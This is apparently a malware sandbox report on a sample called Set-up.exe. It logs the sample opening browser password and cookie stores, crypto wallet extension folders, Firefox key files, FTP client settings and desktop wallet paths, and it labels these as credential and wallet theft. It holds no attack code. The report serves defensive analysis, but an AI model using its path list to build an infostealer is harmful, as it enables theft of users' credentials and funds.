Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
